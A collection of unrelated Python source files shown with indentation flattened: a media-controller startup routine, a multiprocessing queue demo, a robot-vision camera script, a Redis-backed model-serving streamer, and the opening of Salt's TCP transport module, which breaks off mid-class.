if extmd:
logging.info("external metadata enabled")
ac2.metadata.external_metadata = True
else:
logging.info("external metadata disabled")
ac2.metadata.external_metadata = False
else:
logging.info("no privacy settings found, using defaults")
logging.debug("ac2.md.extmd %s", ac2.metadata.external_metadata)
# Web server has to rewrite artwork URLs
if server is not None:
mpris.register_metadata_processor(server)
logging.info("enabled web server meta data processor")
# Other system settings
global startup_command
startup_command = config.get("system", "startup-finished", fallback=None)
if debugmode:
from ac2.dev.dummydata import DummyMetadataCreator
dummy = DummyMetadataCreator(server, interval=3)
dummy.start()
def main():
if len(sys.argv) > 1:
if "-v" in sys.argv:
logging.basicConfig(format='%(levelname)s: %(module)s - %(message)s',
level=logging.DEBUG)
logging.debug("enabled verbose logging")
else:
logging.basicConfig(format='%(levelname)s: %(module)s - %(message)s',
level=logging.INFO)
if ('DEBUG' in os.environ):
logging.warning("starting in debug mode...")
debugmode = True
else:
debugmode = False
parse_config(debugmode=debugmode)
monitor = threading.Thread(target=watchdog.monitor_threads_and_exit)
monitor.start()
logging.info("started thread monitor for %s",
",".join(watchdog.monitored_threads.keys()))
signal.signal(signal.SIGUSR1, pause_all)
signal.signal(signal.SIGUSR2, print_state)
logging.info("startup finished")
if startup_command is not None:
os.system(startup_command)
# mpris.print_players()
try:
mpris.main_loop()
except Exception as e:
logging.error("main loop crashed with exception %s", e)
logging.exception(e)
logging.info("Main thread stopped")
main()
|
demo02.py
|
from multiprocessing import JoinableQueue,Process
def customer (queue) :
while True:
r = queue.get()
print("消费:" + r)
queue.task_done() # 消费完成, 通知继续生产
def product(queue,name) :
for i in range(10):
queue.put(name)
print("生产骨头")
queue.join() # 阻塞当前,让队列中其他执行
if __name__ == '__main__':
queue = JoinableQueue()
cus = Process(target=customer,args=(queue,))
cus.daemon = True # 设置开启之前, 一旦进程开启了, 设置不好使
pro = Process(target=product,args=(queue,"骨头"))
cus.start()
pro.start()
print("e")
|
main.py
|
#!/usr/bin/env python3
import argparse
import threading
from time import sleep
import cv2
import depthai as dai
import socket
from common import target_finder
from common.config import NN_IMG_SIZE
from pipelines import object_tracker_detection, object_edge_detection
import logging
from common.mjpeg_stream import MjpegStream
from networktables.util import NetworkTables
from common.utils import FPSHandler
parser = argparse.ArgumentParser()
parser.add_argument('-d', dest='debug', action="store_true", default=False, help='Start in Debug Mode')
args = parser.parse_args()
log = logging.getLogger(__name__)
class Main:
def __init__(self):
log.info("Connected Devices:")
for device in dai.Device.getAllAvailableDevices():
log.info(f"{device.getMxId()} {device.state}")
self.init_networktables()
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
ip_address = s.getsockname()[0]
except:
ip_address = 'localhost'
port1 = 4201
port2 = 4202
self.device_list = {"OAK-1": {
'name': "OAK-1",
'id': "14442C10C14F47D700",
# 'id': "14442C1011043ED700",
'fps_handler': FPSHandler(),
'stream_address': "{}:{}".format(ip_address, port1),
'nt_tab': NetworkTables.getTable("OAK-1")
}, "OAK-2": {
'name': "OAK-2",
# 'id': "14442C10C14F47D700",
'id': "14442C1011043ED700",
'fps_handler': FPSHandler(),
'stream_address': "{}:{}".format(ip_address, port2),
'nt_tab': NetworkTables.getTable("OAK-2")
}}
self.goal_pipeline, self.goal_labels = object_edge_detection.create_pipeline("infiniteRecharge2021")
self.object_pipeline, self.object_labels = object_tracker_detection.create_pipeline("infiniteRecharge2021")
self.oak_1_stream = MjpegStream(IP_ADDRESS=ip_address, HTTP_PORT=port1, colorspace='BW')
self.oak_2_stream = MjpegStream(IP_ADDRESS=ip_address, HTTP_PORT=port2)
def parse_goal_frame(self, frame, edgeFrame, bboxes):
valid_labels = ['red_upper_power_port', 'blue_upper_power_port']
nt_tab = self.device_list['OAK-1']['nt_tab']
if len(bboxes) == 0:
nt_tab.putString("target_label", "None")
nt_tab.putNumber("tv", 0)
for bbox in bboxes:
target_label = self.goal_labels[bbox['label']]
if target_label not in valid_labels:
continue
edgeFrame, target_x, target_y = target_finder.find_largest_contour(edgeFrame, bbox)
if target_x == -999 or target_y == -999:
log.error("Error: Could not find target contour")
continue
angle_offset = ((NN_IMG_SIZE / 2.0) - target_x) * 68.7938003540039 / 1920
if abs(angle_offset) > 30:
log.info("Invalid angle offset. Setting it to 0")
nt_tab.putNumber("tv", 0)
angle_offset = 0
else:
log.info("Found target '{}'\tX Angle Offset: {}".format(target_label, angle_offset))
nt_tab.putNumber("tv", 1)
nt_tab.putString("target_label", target_label)
nt_tab.putNumber("tx", angle_offset)
cv2.rectangle(edgeFrame, (bbox['x_min'], bbox['y_min']), (bbox['x_max'], bbox['y_max']), (255, 255, 255), 2)
cv2.circle(edgeFrame, (int(round(target_x, 0)), int(round(target_y, 0))), radius=5, color=(128, 128, 128), thickness=-1)
bbox['target_x'] = target_x
bbox['target_y'] = target_y
bbox['angle_offset'] = angle_offset
fps = self.device_list['OAK-1']['fps_handler']
fps.next_iter()
cv2.putText(edgeFrame, "{:.2f}".format(fps.fps()), (0, 20), cv2.FONT_HERSHEY_TRIPLEX, 0.5, (255, 255, 255))
self.oak_1_stream.send_frame(edgeFrame)
return frame, edgeFrame, bboxes
def parse_object_frame(self, frame, bboxes):
valid_labels = ['power_cell']
nt_tab = self.device_list['OAK-2']['nt_tab']
power_cell_counter = 0
for bbox in bboxes:
target_label = self.object_labels[bbox['label']]
if target_label not in valid_labels:
continue
power_cell_counter += 1
box_color = (0, 150, 150)
if power_cell_counter >= 5:
box_color = (0, 255, 0)
elif power_cell_counter < 3:
box_color = (0, 0, 255)
for bbox in bboxes:
cv2.rectangle(frame, (bbox['x_min'], bbox['y_min']), (bbox['x_max'], bbox['y_max']), box_color, 2)
nt_tab.putNumber("powercells", power_cell_counter)
nt_tab.putBoolean("indexer_full", power_cell_counter >= 5)
fps = self.device_list['OAK-2']['fps_handler']
fps.next_iter()
cv2.putText(frame, "{:.2f}".format(fps.fps()), (0, 20), cv2.FONT_HERSHEY_TRIPLEX, 0.5, (255, 255, 255))
self.oak_2_stream.send_frame(frame)
return frame, bboxes
def init_networktables(self):
NetworkTables.startClientTeam(4201)
if not NetworkTables.isConnected():
log.info("Could not connect to team client. Trying other addresses...")
NetworkTables.startClient([
'10.42.1.2',
'127.0.0.1',
'10.0.0.2',
'192.168.100.108'
])
if NetworkTables.isConnected():
log.info("NT Connected to {}".format(NetworkTables.getRemoteAddress()))
return True
else:
log.error("Could not connect to NetworkTables. Restarting server...")
return False
def run(self):
log.info("Setup complete, parsing frames...")
threadlist = []
try:
found_1, device_info_1 = dai.Device.getDeviceByMxId(self.device_list['OAK-1']['id'])
self.device_list['OAK-1']['nt_tab'].putBoolean("OAK-1 Status", found_1)
if found_1:
th1 = threading.Thread(target=self.run_goal_detection, args=(device_info_1,))
th1.start()
threadlist.append(th1)
found_2, device_info_2 = dai.Device.getDeviceByMxId(self.device_list['OAK-2']['id'])
self.device_list['OAK-2']['nt_tab'].putBoolean("OAK-2 Status", found_2)
if found_2:
th2 = threading.Thread(target=self.run_object_detection, args=(device_info_2,))
th2.start()
threadlist.append(th2)
while True:
for t in threadlist:
if not t.is_alive():
break
sleep(10)
finally:
log.info("Exiting Program...")
def run_goal_detection(self, device_info):
self.device_list['OAK-1']['nt_tab'].putString("OAK-1 Stream", self.device_list['OAK-1']['stream_address'])
for frame, edgeFrame, bboxes in object_edge_detection.capture(device_info):
self.parse_goal_frame(frame, edgeFrame, bboxes)
def run_object_detection(self, device_info):
self.device_list['OAK-1']['nt_tab'].putString("OAK-2 Stream", self.device_list['OAK-2']['stream_address'])
for frame, bboxes in object_tracker_detection.capture(device_info):
self.parse_object_frame(frame, bboxes)
class MainDebug(Main):
def __init__(self):
super().__init__()
def parse_goal_frame(self, frame, edgeFrame, bboxes):
frame, edgeFrame, bboxes = super().parse_goal_frame(frame, edgeFrame, bboxes)
valid_labels = ['red_upper_power_port', 'blue_upper_power_port']
for bbox in bboxes:
target_label = self.goal_labels[bbox['label']]
if target_label not in valid_labels:
continue
if 'target_x' not in bbox:
continue
target_x = bbox['target_x'] if 'target_x' in bbox else 0
angle_offset = bbox['angle_offset'] if 'angle_offset' in bbox else 0
cv2.rectangle(frame, (bbox['x_min'], bbox['y_min']), (bbox['x_max'], bbox['y_max']), (0, 255, 0), 2)
cv2.putText(frame, "x: {}".format(round(target_x, 2)), (bbox['x_min'], bbox['y_min'] + 30),
cv2.FONT_HERSHEY_TRIPLEX, 0.5, (255, 255, 255))
cv2.putText(frame, "y: {}".format(round(bbox['y_mid'], 2)), (bbox['x_min'], bbox['y_min'] + 50),
cv2.FONT_HERSHEY_TRIPLEX, 0.5, (255, 255, 255))
cv2.putText(frame, "angle: {}".format(round(angle_offset, 3)), (bbox['x_min'], bbox['y_min'] + 70),
cv2.FONT_HERSHEY_TRIPLEX, 0.5, (255, 255, 255))
cv2.putText(frame, "conf: {}".format(round(bbox['confidence'], 2)), (bbox['x_min'], bbox['y_min'] + 90),
cv2.FONT_HERSHEY_TRIPLEX, 0.5, (255, 255, 255))
cv2.putText(frame, "label: {}".format(self.goal_labels[bbox['label']], 1), (bbox['x_min'], bbox['y_min'] + 110),
cv2.FONT_HERSHEY_TRIPLEX, 0.5, (255, 255, 255))
cv2.imshow("OAK-1 Edge", edgeFrame)
cv2.imshow("OAK-1", frame)
key = cv2.waitKey(1)
if key == ord("q"):
raise StopIteration()
def parse_object_frame(self, frame, bboxes):
frame, bboxes = super().parse_object_frame(frame, bboxes)
for bbox in bboxes:
cv2.putText(frame, "id: {}".format(bbox['id']), (bbox['x_min'], bbox['y_min'] + 30), cv2.FONT_HERSHEY_TRIPLEX, 0.5, (255, 255, 255))
cv2.putText(frame, "status: {}".format(bbox['status']), (bbox['x_min'], bbox['y_min'] + 50), cv2.FONT_HERSHEY_TRIPLEX, 0.5, (255, 255, 255))
cv2.imshow("OAK-1 Objects", frame)
key = cv2.waitKey(1)
if key == ord("q"):
raise StopIteration()
if __name__ == '__main__':
log.info("Starting object-detection-host")
if args.debug:
MainDebug().run()
else:
Main().run()
|
service_streamer.py
|
# coding=utf-8
# Created by Meteorix at 2019/7/13
import logging
import multiprocessing
import os
import threading
import time
import uuid
import weakref
import pickle
from queue import Queue, Empty
from typing import List
from redis import Redis
from .managed_model import ManagedModel
TIMEOUT = 1
TIME_SLEEP = 0.001
WORKER_TIMEOUT = 20
logger = logging.getLogger(__name__)
logger.setLevel("INFO")
mp = multiprocessing.get_context("spawn")
class Future(object):
def __init__(self, task_id, task_size, future_cache_ref):
self._id = task_id
self._size = task_size
self._future_cache_ref = future_cache_ref
self._outputs = []
self._finish_event = threading.Event()
def result(self, timeout=None):
if self._size == 0:
self._finish_event.set()
return []
finished = self._finish_event.wait(timeout)
if not finished:
raise TimeoutError("Task: %d Timeout" % self._id)
# remove from future_cache
future_cache = self._future_cache_ref()
if future_cache is not None:
del future_cache[self._id]
# [(request_id, output), ...] sorted by request_id
self._outputs.sort(key=lambda i: i[0])
# restore batch result from outputs
batch_result = [i[1] for i in self._outputs]
return batch_result
def done(self):
if self._finish_event.is_set():
return True
def _append_result(self, it_id, it_output):
self._outputs.append((it_id, it_output))
if len(self._outputs) >= self._size:
self._finish_event.set()
class _FutureCache(dict):
"Dict for weakref only"
pass
class _BaseStreamer(object):
def __init__(self, *args, **kwargs):
super().__init__()
self._client_id = str(uuid.uuid4())
self._task_id = 0
self._future_cache = _FutureCache() # {task_id: future}
self.back_thread = threading.Thread(target=self._loop_collect_result, name="thread_collect_result")
self.back_thread.daemon = True
def _delay_setup(self):
self.back_thread.start()
def _send_request(self, task_id, request_id, model_input):
raise NotImplementedError
def _recv_response(self, timeout=TIMEOUT):
raise NotImplementedError
def _input(self, batch: List) -> int:
"""
input a batch, distribute each item to mq, return task_id
"""
# task id in one client
task_id = self._task_id
self._task_id += 1
# request id in one task
request_id = 0
future = Future(task_id, len(batch), weakref.ref(self._future_cache))
self._future_cache[task_id] = future
for model_input in batch:
self._send_request(task_id, request_id, model_input)
request_id += 1
return task_id
def _loop_collect_result(self):
logger.info("start _loop_collect_result")
while True:
message = self._recv_response(timeout=TIMEOUT)
if message:
(task_id, request_id, item) = message
future = self._future_cache[task_id]
future._append_result(request_id, item)
else:
# todo
time.sleep(TIME_SLEEP)
def _output(self, task_id: int) -> List:
future = self._future_cache[task_id]
batch_result = future.result(WORKER_TIMEOUT)
return batch_result
def submit(self, batch):
task_id = self._input(batch)
future = self._future_cache[task_id]
return future
def predict(self, batch):
task_id = self._input(batch)
ret = self._output(task_id)
return ret
class _BaseStreamWorker(object):
def __init__(self, predict_function, batch_size, max_latency, *args, **kwargs):
super().__init__()
assert callable(predict_function)
self._pid = os.getpid()
self._predict = predict_function
self._batch_size = batch_size
self._max_latency = max_latency
def run_forever(self):
self._pid = os.getpid() # overwrite the pid
logger.info("[gpu worker %d] %s start working" % (self._pid, self))
while True:
handled = self._run_once()
if not handled:
# sleep if no data handled last time
time.sleep(TIME_SLEEP)
def model_predict(self, batch_input):
batch_result = self._predict(batch_input)
return batch_result
def _run_once(self):
batch = []
start_time = time.time()
for i in range(self._batch_size):
try:
item = self._recv_request(timeout=self._max_latency)
except TimeoutError:
# each item timeout exceed the max latency
break
else:
batch.append(item)
if (time.time() - start_time) > self._max_latency:
# total batch time exceeds the max latency
break
if not batch:
return 0
model_inputs = [i[3] for i in batch]
model_outputs = self.model_predict(model_inputs)
# publish results to redis
for i, item in enumerate(batch):
client_id, task_id, request_id, _ = item
self._send_response(client_id, task_id, request_id, model_outputs[i])
batch_size = len(batch)
logger.info("[gpu worker %d] run_once batch_size: %d start_at: %s spend: %s" % (
self._pid, batch_size, start_time, time.time() - start_time))
return batch_size
def _recv_request(self, timeout=TIMEOUT):
raise NotImplementedError
def _send_response(self, client_id, task_id, request_id, model_input):
raise NotImplementedError
class ThreadedStreamer(_BaseStreamer):
def __init__(self, predict_function, batch_size, max_latency=0.1):
super().__init__()
self._input_queue = Queue()
self._output_queue = Queue()
self._worker = ThreadedWorker(predict_function, batch_size, max_latency, self._input_queue, self._output_queue)
self._worker_thread = threading.Thread(target=self._worker.run_forever, name="thread_worker")
self._worker_thread.daemon = True
self._worker_thread.start()
self._delay_setup()
def _send_request(self, task_id, request_id, model_input):
self._input_queue.put((0, task_id, request_id, model_input))
def _recv_response(self, timeout=TIMEOUT):
try:
message = self._output_queue.get(timeout=timeout)
except Empty:
message = None
return message
class ThreadedWorker(_BaseStreamWorker):
def __init__(self, predict_function, batch_size, max_latency, request_queue, response_queue):
super().__init__(predict_function, batch_size, max_latency)
self._request_queue = request_queue
self._response_queue = response_queue
def _recv_request(self, timeout=TIMEOUT):
try:
item = self._request_queue.get(timeout=timeout)
except Empty:
raise TimeoutError
else:
return item
def _send_response(self, client_id, task_id, request_id, model_output):
self._response_queue.put((task_id, request_id, model_output))
class Streamer(_BaseStreamer):
def __init__(self, predict_function_or_model, batch_size, max_latency=0.1, worker_num=1,
cuda_devices=None, model_init_args=None, model_init_kwargs=None):
super().__init__()
self.worker_num = worker_num
self.cuda_devices = cuda_devices
self._input_queue = mp.Queue()
self._output_queue = mp.Queue()
self._worker = StreamWorker(predict_function_or_model, batch_size, max_latency, self._input_queue,
self._output_queue, model_init_args, model_init_kwargs)
self._worker_ps = []
self._worker_ready_events = []
self._setup_gpu_worker()
self._delay_setup()
def _setup_gpu_worker(self):
for i in range(self.worker_num):
e = mp.Event()
if self.cuda_devices is not None:
gpu_id = self.cuda_devices[i % len(self.cuda_devices)]
args = (gpu_id, e,)
else:
args = (None, e,)
p = mp.Process(target=self._worker.run_forever, args=args, name="stream_worker", daemon=True)
p.start()
self._worker_ps.append(p)
self._worker_ready_events.append(e)
def _wait_for_worker_ready(self, timeout=WORKER_TIMEOUT):
# wait for all workers finishing init
for (i, e) in enumerate(self._worker_ready_events):
# todo: select all events with timeout
is_ready = e.wait(timeout)
logger.info("gpu worker:%d ready state: %s" % (i, is_ready))
def _send_request(self, task_id, request_id, model_input):
self._input_queue.put((0, task_id, request_id, model_input))
def _recv_response(self, timeout=TIMEOUT):
try:
message = self._output_queue.get(timeout=timeout)
except Empty:
message = None
return message
class StreamWorker(_BaseStreamWorker):
def __init__(self, predict_function_or_model, batch_size, max_latency, request_queue, response_queue,
model_init_args, model_init_kwargs):
super().__init__(predict_function_or_model, batch_size, max_latency)
self._request_queue = request_queue
self._response_queue = response_queue
self._model_init_args = model_init_args or []
self._model_init_kwargs = model_init_kwargs or {}
def run_forever(self, gpu_id=None, ready_event=None):
# if it is a managed model, lazy init model after forked & set CUDA_VISIBLE_DEVICES
if isinstance(self._predict, type) and issubclass(self._predict, ManagedModel):
model_class = self._predict
logger.info("[gpu worker %d] init model on gpu:%s" % (os.getpid(), gpu_id))
self._model = model_class(gpu_id)
self._model.init_model(*self._model_init_args, **self._model_init_kwargs)
logger.info("[gpu worker %d] init model on gpu:%s" % (os.getpid(), gpu_id))
self._predict = self._model.predict
if ready_event:
ready_event.set() # tell father process that init is finished
super().run_forever()
def _recv_request(self, timeout=TIMEOUT):
try:
item = self._request_queue.get(timeout=timeout)
except Empty:
raise TimeoutError
else:
return item
def _send_response(self, client_id, task_id, request_id, model_output):
self._response_queue.put((task_id, request_id, model_output))
class RedisStreamer(_BaseStreamer):
"""
1. input batch as a task
2. distribute every single item in batch to redis
3. backend loop collecting results
3. output batch result for a task when every single item is returned
"""
def __init__(self, redis_broker="localhost:6379", prefix=''):
super().__init__()
self.prefix = prefix
self._redis_broker = redis_broker
self._redis = _RedisClient(self._client_id, self._redis_broker, self.prefix)
self._delay_setup()
def _send_request(self, task_id, request_id, model_input):
self._redis.send_request(task_id, request_id, model_input)
def _recv_response(self, timeout=TIMEOUT):
return self._redis.recv_response(timeout)
class RedisWorker(_BaseStreamWorker):
def __init__(self, model_class, batch_size, max_latency=0.1,
redis_broker="localhost:6379", prefix='', model_init_args=None, model_init_kwargs=None):
# assert issubclass(model_class, ManagedModel)
super().__init__(model_class, batch_size, max_latency)
self.prefix = prefix
self._model_init_args = model_init_args or []
self._model_init_kwargs = model_init_kwargs or {}
self._redis_broker = redis_broker
self._redis = _RedisServer(0, self._redis_broker, self.prefix)
self._requests_queue = Queue()
self.back_thread = threading.Thread(target=self._loop_recv_request, name="thread_recv_request")
self.back_thread.daemon = True
self.back_thread.start()
def run_forever(self, gpu_id=None):
logger.info("[gpu worker %d] init model on gpu:%s" % (os.getpid(), gpu_id))
model_class = self._predict
self._model = model_class(gpu_id)
self._model.init_model(*self._model_init_args, **self._model_init_kwargs)
self._predict = self._model.predict
super().run_forever()
def _loop_recv_request(self):
logger.info("[gpu worker %d] start loop_recv_request" % (os.getpid()))
while True:
message = self._redis.recv_request(timeout=TIMEOUT)
if message:
(client_id, task_id, request_id, request_item) = pickle.loads(message)
self._requests_queue.put((client_id, task_id, request_id, request_item))
else:
# sleep if recv timeout
time.sleep(TIME_SLEEP)
def _recv_request(self, timeout=TIMEOUT):
try:
item = self._requests_queue.get(timeout=timeout)
except Empty:
raise TimeoutError
else:
return item
def _send_response(self, client_id, task_id, request_id, model_output):
self._redis.send_response(client_id, task_id, request_id, model_output)
def _setup_redis_worker_and_runforever(model_class, batch_size, max_latency, gpu_id, redis_broker, prefix=''):
redis_worker = RedisWorker(model_class, batch_size, max_latency, redis_broker=redis_broker, prefix=prefix)
redis_worker.run_forever(gpu_id)
def run_redis_workers_forever(model_class, batch_size, max_latency=0.1,
worker_num=1, cuda_devices=None, redis_broker="localhost:6379",
prefix='', model_init_args=None, model_init_kwargs=None):
procs = []
for i in range(worker_num):
if cuda_devices is not None:
gpu_id = cuda_devices[i % len(cuda_devices)]
else:
gpu_id = None
args = [model_class, batch_size, max_latency, gpu_id, redis_broker, prefix]
p = mp.Process(target=_setup_redis_worker_and_runforever, args=args, name="stream_worker", daemon=True)
p.start()
procs.append(p)
for p in procs:
p.join()
class _RedisAgent(object):
def __init__(self, redis_id, redis_broker='localhost:6379', prefix=''):
self._redis_id = redis_id
self._redis_host = redis_broker.split(":")[0]
self._redis_port = int(redis_broker.split(":")[1])
self._redis_request_queue_name = "request_queue" + prefix
self._redis_response_pb_prefix = "response_pb_" + prefix
self._redis = Redis(host=self._redis_host, port=self._redis_port)
self._response_pb = self._redis.pubsub(ignore_subscribe_messages=True)
self._setup()
def _setup(self):
raise NotImplementedError
def _response_pb_name(self, redis_id):
return self._redis_response_pb_prefix + redis_id
class _RedisClient(_RedisAgent):
def _setup(self):
self._response_pb.subscribe(self._response_pb_name(self._redis_id))
def send_request(self, task_id, request_id, model_input):
message = (self._redis_id, task_id, request_id, model_input)
self._redis.lpush(self._redis_request_queue_name, pickle.dumps(message))
def recv_response(self, timeout):
message = self._response_pb.get_message(timeout=timeout)
if message:
return pickle.loads(message["data"])
class _RedisServer(_RedisAgent):
def _setup(self):
# server subscribe all pubsub
self._response_pb.psubscribe(self._redis_response_pb_prefix + "*")
def recv_request(self, timeout):
message = self._redis.blpop(self._redis_request_queue_name, timeout=timeout)
# (queue_name, data)
if message:
return message[1]
def send_response(self, client_id, task_id, request_id, model_output):
message = (task_id, request_id, model_output)
channel_name = self._response_pb_name(client_id)
self._redis.publish(channel_name, pickle.dumps(message))
|
tcp.py
|
# -*- coding: utf-8 -*-
'''
TCP transport classes
Wire protocol: "len(payload) msgpack({'head': SOMEHEADER, 'body': SOMEBODY})"
'''
# Import Python Libs
from __future__ import absolute_import, print_function, unicode_literals
import errno
import logging
import msgpack
import socket
import os
import weakref
import time
import traceback
# Import Salt Libs
import salt.crypt
import salt.utils.asynchronous
import salt.utils.event
import salt.utils.files
import salt.utils.platform
import salt.utils.process
import salt.utils.verify
import salt.payload
import salt.exceptions
import salt.transport.frame
import salt.transport.ipc
import salt.transport.client
import salt.transport.server
import salt.transport.mixins.auth
from salt.ext import six
from salt.ext.six.moves import queue # pylint: disable=import-error
from salt.exceptions import SaltReqTimeoutError, SaltClientError
from salt.transport import iter_transport_opts
# Import Tornado Libs
import tornado
import tornado.tcpserver
import tornado.gen
import tornado.concurrent
import tornado.tcpclient
import tornado.netutil
# pylint: disable=import-error,no-name-in-module
if six.PY2:
import urlparse
else:
import urllib.parse as urlparse
# pylint: enable=import-error,no-name-in-module
# Import third party libs
try:
from M2Crypto import RSA
HAS_M2 = True
except ImportError:
HAS_M2 = False
try:
from Cryptodome.Cipher import PKCS1_OAEP
except ImportError:
from Crypto.Cipher import PKCS1_OAEP
if six.PY3 and salt.utils.platform.is_windows():
USE_LOAD_BALANCER = True
else:
USE_LOAD_BALANCER = False
if USE_LOAD_BALANCER:
import threading
import multiprocessing
import tornado.util
from salt.utils.process import SignalHandlingMultiprocessingProcess
log = logging.getLogger(__name__)
def _set_tcp_keepalive(sock, opts):
'''
Ensure that TCP keepalives are set for the socket.
'''
if hasattr(socket, 'SO_KEEPALIVE'):
if opts.get('tcp_keepalive', False):
sock.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1)
if hasattr(socket, 'SOL_TCP'):
if hasattr(socket, 'TCP_KEEPIDLE'):
tcp_keepalive_idle = opts.get('tcp_keepalive_idle', -1)
if tcp_keepalive_idle > 0:
sock.setsockopt(
socket.SOL_TCP, socket.TCP_KEEPIDLE,
int(tcp_keepalive_idle))
if hasattr(socket, 'TCP_KEEPCNT'):
tcp_keepalive_cnt = opts.get('tcp_keepalive_cnt', -1)
if tcp_keepalive_cnt > 0:
sock.setsockopt(
socket.SOL_TCP, socket.TCP_KEEPCNT,
int(tcp_keepalive_cnt))
if hasattr(socket, 'TCP_KEEPINTVL'):
tcp_keepalive_intvl = opts.get('tcp_keepalive_intvl', -1)
if tcp_keepalive_intvl > 0:
sock.setsockopt(
socket.SOL_TCP, socket.TCP_KEEPINTVL,
int(tcp_keepalive_intvl))
if hasattr(socket, 'SIO_KEEPALIVE_VALS'):
# Windows doesn't support TCP_KEEPIDLE, TCP_KEEPCNT, nor
# TCP_KEEPINTVL. Instead, it has its own proprietary
# SIO_KEEPALIVE_VALS.
tcp_keepalive_idle = opts.get('tcp_keepalive_idle', -1)
tcp_keepalive_intvl = opts.get('tcp_keepalive_intvl', -1)
# Windows doesn't support changing something equivalent to
# TCP_KEEPCNT.
if tcp_keepalive_idle > 0 or tcp_keepalive_intvl > 0:
# Windows defaults may be found by using the link below.
# Search for 'KeepAliveTime' and 'KeepAliveInterval'.
# https://technet.microsoft.com/en-us/library/bb726981.aspx#EDAA
# If one value is set and the other isn't, we still need
# to send both values to SIO_KEEPALIVE_VALS and they both
# need to be valid. So in that case, use the Windows
# default.
if tcp_keepalive_idle <= 0:
tcp_keepalive_idle = 7200
if tcp_keepalive_intvl <= 0:
tcp_keepalive_intvl = 1
# The values expected are in milliseconds, so multiply by
# 1000.
sock.ioctl(socket.SIO_KEEPALIVE_VALS, (
1, int(tcp_keepalive_idle * 1000),
int(tcp_keepalive_intvl * 1000)))
else:
sock.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 0)
if USE_LOAD_BALANCER:
class LoadBalancerServer(SignalHandlingMultiprocessingProcess):
'''
Raw TCP server which runs in its own process and will listen
for incoming connections. Each incoming connection will be
sent via multiprocessing queue to the workers.
Since the queue is shared amongst workers, only one worker will
handle a given connection.
'''
# TODO: opts!
# Based on default used in tornado.netutil.bind_sockets()
backlog = 128
def __init__(self, opts, socket_queue, **kwargs):
super(LoadBalancerServer, self).__init__(**kwargs)
self.opts = opts
self.socket_queue = socket_queue
self._socket = None
# __setstate__ and __getstate__ are only used on Windows.
# We do this so that __init__ will be invoked on Windows in the child
# process so that a register_after_fork() equivalent will work on
# Windows.
def __setstate__(self, state):
self._is_child = True
self.__init__(
state['opts'],
state['socket_queue'],
log_queue=state['log_queue'],
log_queue_level=state['log_queue_level']
)
def __getstate__(self):
return {
'opts': self.opts,
'socket_queue': self.socket_queue,
'log_queue': self.log_queue,
'log_queue_level': self.log_queue_level
}
def close(self):
if self._socket is not None:
self._socket.shutdown(socket.SHUT_RDWR)
self._socket.close()
self._socket = None
def __del__(self):
self.close()
def run(self):
'''
Start the load balancer
'''
self._socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
_set_tcp_keepalive(self._socket, self.opts)
self._socket.setblocking(1)
self._socket.bind((self.opts['interface'], int(self.opts['ret_port'])))
self._socket.listen(self.backlog)
while True:
try:
# Wait for a connection to occur since the socket is
# blocking.
connection, address = self._socket.accept()
# Wait for a free slot to be available to put
# the connection into.
# Sockets are picklable on Windows in Python 3.
self.socket_queue.put((connection, address), True, None)
except socket.error as e:
# ECONNABORTED indicates that there was a connection
# but it was closed while still in the accept queue.
# (observed on FreeBSD).
if tornado.util.errno_from_exception(e) == errno.ECONNABORTED:
continue
raise
# TODO: move serial down into message library
class AsyncTCPReqChannel(salt.transport.client.ReqChannel):
'''
Encapsulate sending routines to tcp.
Note: this class returns a singleton
'''
# This class is only a singleton per minion/master pair
# mapping of io_loop -> {key -> channel}
instance_map = weakref.WeakKeyDictionary()
def __new__(cls, opts, **kwargs):
'''
Only create one instance of channel per __key()
'''
# do we have any mapping for this io_loop
io_loop = kwargs.get('io_loop') or tornado.ioloop.IOLoop.current()
if io_loop not in cls.instance_map:
cls.instance_map[io_loop] = weakref.WeakValueDictionary()
loop_instance_map = cls.instance_map[io_loop]
key = cls.__key(opts, **kwargs)
obj = loop_instance_map.get(key)
if obj is None:
log.debug('Initializing new AsyncTCPReqChannel for %s', key)
# we need to make a local variable for this, as we are going to store
# it in a WeakValueDictionary-- which will remove the item if no one
# references it-- this forces a reference while we return to the caller
obj = object.__new__(cls)
obj.__singleton_init__(opts, **kwargs)
loop_instance_map[key] = obj
else:
log.debug('Re-using AsyncTCPReqChannel for %s', key)
return obj
@classmethod
def __key(cls, opts, **kwargs):
if 'master_uri' in kwargs:
opts['master_uri'] = kwargs['master_uri']
return (opts['pki_dir'], # where the keys are stored
opts['id'], # minion ID
opts['master_uri'],
kwargs.get('crypt', 'aes'), # TODO: use the same channel for crypt
)
# has to remain empty for singletons, since __init__ will *always* be called
def __init__(self, opts, **kwargs):
pass
# an init for the singleton instance to call
def __singleton_init__(self, opts, **kwargs):
self.opts = dict(opts)
self.serial = salt.payload.Serial(self.opts)
# crypt defaults to 'aes'
self.crypt = kwargs.get('crypt', 'aes')
self.io_loop = kwargs.get('io_loop') or tornado.ioloop.IOLoop.current()
if self.crypt != 'clear':
self.auth = salt.crypt.AsyncAuth(self.opts, io_loop=self.io_loop)
resolver = kwargs.get('resolver')
parse = urlparse.urlparse(self.opts['master_uri'])
master_host, master_port = parse.netloc.rsplit(':', 1)
self.master_addr = (master_host, int(master_port))
self._closing = False
self.message_client = SaltMessageClientPool(self.opts,
args=(self.opts, master_host, int(master_port),),
kwargs={'io_loop': self.io_loop, 'resolver': resolver,
'source_ip': self.opts.get('source_ip'),
'source_port': self.opts.get('source_ret_port')})
def close(self):
if self._closing:
return
self._closing = True
self.message_client.close()
def __del__(self):
self.close()
def _package_load(self, load):
return {
'enc': self.crypt,
'load': load,
}
@tornado.gen.coroutine
def crypted_transfer_decode_dictentry(self, load, dictkey=None, tries=3, timeout=60):
if not self.auth.authenticated:
yield self.auth.authenticate()
ret = yield self.message_client.send(self._package_load(self.auth.crypticle.dumps(load)), timeout=timeout)
key = self.auth.get_keys()
if HAS_M2:
aes = key.private_decrypt(ret['key'], RSA.pkcs1_oaep_padding)
else:
cipher = PKCS1_OAEP.new(key)
aes = cipher.decrypt(ret['key'])
pcrypt = salt.crypt.Crypticle(self.opts, aes)
data = pcrypt.loads(ret[dictkey])
if six.PY3:
data = salt.transport.frame.decode_embedded_strs(data)
raise tornado.gen.Return(data)
@tornado.gen.coroutine
